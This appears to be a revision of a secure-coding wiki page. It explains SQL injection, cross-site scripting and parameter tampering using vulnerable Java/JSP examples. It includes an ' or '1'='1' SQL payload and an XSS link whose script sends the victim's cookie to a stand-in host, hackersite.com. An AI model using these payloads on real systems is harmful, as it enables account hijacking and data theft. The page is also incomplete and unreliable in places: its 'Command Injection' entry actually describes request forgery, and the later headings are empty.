Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.
  1. SQL Injections: Occurs when untrusted data is used to construct dynamic SQL statements using string concatenation. Consider the following example

    Code Block
    languagejava
    titleDynamic SQL Concatenation
    public void doGet(HttpServletRequest request, HttpServletResponse response)
    {
    
        try {
          //Retrieve the "userName" parameter from the GET request
          String userName = request.getParameter("username");
       
          //Perform an SQL query for the roles associated with the given "username"
          String result = doQuery("SELECT roles FROM userroles WHERE username = '" + userName +"'");
    
          response.getOutputStream().print(result);
        }
    }


    If an attacker manipulated username and entered: "' or '1'='1". The query would read (attacker's payload in red

    SELECT roles FROM userroles WHERE username ='' or '1'='1'

    This query would give the attacker all the roles possible. There are several forms of SQL injections like blind SQL injection and others. They all share the main idea of using user-controllable data to construct SQL statements.


  2. Cross-site Scripting: occurs when the application uses untrusted data to build HTML back to the browser. An attacker could use this vulnerability to inject malicious script into user's browser, possibly gaining full control over the user browsers.
    Consider the following example:

    Code Block
    languagejava
    <html>
    <head>
    <title>Reflected Cross-site Scripting Example</title>
    </head>
    <body>
       <div>The following error occurred:</div>
       <div><%=request.getParameter("msg")%></div>
    </body>
    </html>

    If an attacker sent a link to victim as follows (attacker's payload in red): www.vulnerableapp.com/vulnerablefile.jsp?msg=<script>document.write("<img+src='www.hackersite.com?id='"%2bdocument.cookie%2b"'>")</script> 

    If the user clicked on that link, their cookie will be transmitted to the attacker, which they can use to hijack the victim's account. Another more dangerous version of this attack, called persistent cross-site scripting, is where the payload actually is persistent in the database and uses could get infected by simply browsing to the page that serve's the attacker's payload.

  3. Parameter Tampering: occurs when the application does nor perform user entitlement checks before retrieving the user's records from the data store (e.g. database). Consider the following example:

    Code Block
    languagejava
    	protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    		
    	  try
    	  {
      	     int id = Integer.parseInt(request.getParameter("recordID"));
      	     String selectStatement = "SELECT account_balance FROM user_data WHERE recordID = ? ";
      	     PreparedStatement prepStmt = con.prepareStatement(selectStatement);
      	     prepStmt.setInt(1, id);
      	     ResultSet rs = prepStmt.executeQuery();
    	  }
    	  catch(SQLException ex)
    	  {
    	     logger.error(ex); 
    	  }
    	}

    Now, an attacker could retrieve any record by simply iterating through the "recordID" parameter.

  4. Command Injection: occurs when the victim's browser is forced to send unintentional requests, as the victims browsers to the attacker's website. 

  5. Cross-site Request Forgery:
  6. Weak Authentication:
  7. Weak Authorization
  8. Insecure File Upload:
  9. Invalidated Redirects:

...